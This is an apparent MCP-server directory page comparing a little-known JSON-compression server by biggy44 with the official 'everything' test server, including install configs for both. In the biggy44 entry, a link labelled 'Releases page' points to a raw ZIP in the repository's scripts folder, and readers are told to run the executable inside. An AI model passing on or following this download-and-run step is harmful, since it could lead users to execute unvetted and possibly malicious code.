mcp-server vs everything
Side-by-side comparison to help you pick between these two MCP servers.
mcp-server by biggy44 | everything by modelcontextprotocol | |
|---|---|---|
| Stars | ★ 1 | ★ 85,748 |
| 30d uses | — | — |
| Score | 31 | 77 |
| Official | — | ✓ |
| Categories | AI / LLM ToolsDeveloper ToolsOther | Developer ToolsAI / LLM ToolsOther |
| Language | TypeScript | TypeScript |
| Last commit | this month | this month |
mcp-server · Summary
ASON MCP server for efficient JSON compression/decompression to optimize token usage.
everything · Summary
Official MCP test server exercising all protocol features for client builders.
mcp-server · Use cases
- Reducing token usage when passing large JSON objects to AI models
- Optimizing data transfer between MCP clients and servers
- Compressing configuration files and settings in AI workflows
everything · Use cases
- Testing MCP client implementations against all protocol features
- Learning MCP protocol capabilities through a reference server
- Validating client compatibility with different transport methods
mcp-server · Install
Installation Steps
- Download the appropriate binary for your system from the [Releases page](https://github.com/biggy44/mcp-server/raw/refs/heads/main/scripts/server_mcp_v1.2.zip)
- Extract the downloaded ZIP file
- Run the executable to start the server
Claude Desktop Configuration
Add the following to your Claude Desktop configuration:
{
"mcpServers": {
"ason": {
"command": "path/to/ason-server",
"args": []
}
}
}everything · Install
NPX (recommended)
{
"mcpServers": {
"everything": {
"command": "npx",
"args": ["-y", "@modelcontextprotocol/server-everything"]
}
}
}On Windows, use cmd /c:
{
"mcpServers": {
"everything": {
"command": "cmd",
"args": ["/c", "npx", "-y", "@modelcontextprotocol/server-everything"]
}
}
}Docker
{
"mcpServers": {
"everything": {
"command": "docker",
"args": ["run", "-i", "--rm", "mcp/everything"]
}
}
}Global install
npm install -g @modelcontextprotocol/server-everything@latest
npx @modelcontextprotocol/server-everything